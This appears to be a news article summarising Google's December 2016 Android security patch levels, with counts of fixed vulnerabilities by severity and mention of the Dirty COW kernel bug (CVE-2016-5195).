Specifically, Google’s December 2016 security patching cycle included two different releases, each of which came with fixes that were aimed at both Google and other Android devices.
The so-called 2016-12-01 security patch level includes 5 different fixes aimed at vulnerabilities flagged as “high” severity and 6 others for moderate issues. There are two different remote code execution flaws patches with CVE-2016-5419, CVE-2016-5420, CVE-2016-5421, and CVE-2016-6768, two denial of service vulnerabilities, four elevation of privilege vulnerabilities, and two information disclosure holes.
It’s important to note that Android 7.0 or later is not affected by these vulnerabilities if they are already running the latest updates. On the other hand, the rest of the Android versions on the market, starting with 4.4 and ending with 6.0.1, are all targeted by these updates.
Then, there’s the 2016-12-05 security patch level, which comes with a bigger number of fixes. There are 58 patches included in this update, 11 of which are rated as critical, 33 as high, and 14 as medium severity risk.
Most of the vulnerabilities fixed with this update would allow for elevation of privilege and Google says that both its own devices and other Android phones and tablets on the market were exposed. Once again, all versions of Android starting with 4.4.4 should install the patches as soon as possible.
Two important patches are CVE-2016-4794 and CVE-2016-5195 which fix the Dirty COW security bug discovered on Linux and also affecting Android, allowing attackers to root devices and get full root access to local data. Google rates the bug as critical and fixes the patch on all its devices, starting with Pixel C, Pixel, Pixel XL, Nexus 5X, and Nexus 6P.
“An elevation of privilege vulnerability in the kernel memory subsystem could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device,” Google says.
Canonical has already patched the flaw in supported Ubuntu versions, and following this month’s Google patch cycle, no devices should be left vulnerable.
Android devices getting the update receive just a single OTA patch which then displays the December 05, 2016 security patch level on the About information screen.